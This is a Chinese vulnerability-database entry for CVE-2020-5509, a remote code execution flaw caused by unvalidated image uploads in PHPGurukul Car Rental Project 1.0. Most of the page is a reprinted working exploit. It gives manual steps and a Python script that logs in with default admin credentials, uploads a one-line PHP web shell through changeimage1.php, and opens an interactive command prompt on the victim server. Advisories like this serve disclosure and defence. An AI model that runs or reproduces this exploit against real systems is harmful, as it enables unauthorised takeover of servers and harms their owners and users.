Car Rental Project 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1894422 漏洞类型 代码问题
发布时间 2020-01-14 更新时间 2020-01-22
CVE编号 CVE-2020-5509 CNNVD-ID CNNVD-202001-437
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2020010111
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202001-437
|漏洞详情
PHP(PHP:Hypertext Preprocessor,PHP:超文本预处理器)是PHPGroup和开放源代码社区的共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发,支持多种数据库及操作系统。 PHPGurukul Car Rental Project 1.0版本中存在远程代码执行漏洞。攻击者可利用该漏洞上传恶意文件。
|漏洞EXP
# Exploit Title: Car Rental Project v.1.0 Remote Code Execution
# Google Dork: N/A
# Date: 1/3/2020
# Exploit Author: FULLSHADE
# Vendor Homepage:
https://phpgurukul.com/
# Software Link:
https://phpgurukul.com/car-rental-project-php-mysql-free-download/
# Version: 1.0
# Tested on: Windows
# CVE : CVE-2020-5509

==================================================

Information & description

==================================================

Car Rental Project v.1.0 is vulnerable to arbitrary file upload since an admin can change the image of a product and the file change PHP code doesn't validate or care what type of file is submitted, which leads to an attack having the ability to upload malicious files. This Python POC will execute arbitrary commands on the remote server.

==================================================

Manual POC

==================================================

Manual POC method

- Visit carrental > admin login > changeimage1.php
- Upload a php rce vulnerable payload
- Visit /carrentalproject/carrental/admin/img/vehicleimages/.php to visit your file
- Execute commands on the server

==================================================
POC automation script
==================================================

import sys
import requests

print(
    """
+-------------------------------------------------------------+
        Car Rental Project v1.0 -  Remote Code Execution

                FULLSHADE, FullPwn Operations
+-------------------------------------------------------------+
"""
)

def login():

    sessionObj = requests.session()

    RHOSTS = sys.argv[1]
    bigstring = "\n+-------------------------------------------------------------+\n"
    print("+-------------------------------------------------------------+")
    print("[+] Victim host: {}".format(RHOSTS))

    POST_AUTH_LOGIN = "http://" + RHOSTS + "/carrentalproject/carrental/admin/index.php"
    SHELL_UPLOAD_URL = (
        "http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"
    )

    # login / authentication
    payload = {"username": "admin", "password": "Test@12345", "login": ""}
    login = sessionObj.post(POST_AUTH_LOGIN, data=payload)
    # get response
    if login.status_code == 200:
        print("[+] Login HTTP response code: 200")
        print("[+] Successfully logged in")
    else:
        print("[!] Failed to authenticate")
        sys.exit()

    # get session token
    session_cookie_dic = sessionObj.cookies.get_dict()
    token = session_cookie_dic["PHPSESSID"]
    print("[+] Session cookie: {}".format(token))

    # proxy for Burp testing

    proxies = {"http": "
http://127.0.0.1:8080
", "https": "
http://127.0.0.1:8080
"}

    # data for uploading the backdoor request
    backdoor_file = {
        "img1": (
            "1dccadfed7bcbb036c56a4afb97e906f.php",
            '<?php system($_GET["cmd"]); ?>',
            "Content-Type application/x-php",
        )
    }
    backdoor_data = {"update": ""}

    SHELL_UPLOAD_URL = (
        "http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"
    )

    # actually upload the php shell
    try:
        r = sessionObj.post(
            url=SHELL_UPLOAD_URL, files=backdoor_file, data=backdoor_data
        )
        print(
            "[+] Backdoor upload at /carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php" + bigstring
        )
    except:
        print("[!] Failed to upload backdoor")

    # get command execution
    while True:
        COMMAND = str(input('\033[32m' + "Command RCE >> " + '\033[m'))
        SHELL_LOCATION = (
            "http://"
            + RHOSTS
            + "/carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php"
        )
        # get RCE results
        respond = sessionObj.get(SHELL_LOCATION + "?cmd=" + COMMAND)
        print(respond.text)

if __name__ == "__main__":
    login()
|参考资料

来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/155925/Car-Rental-Project-1.0-Remote-Code-Execution.html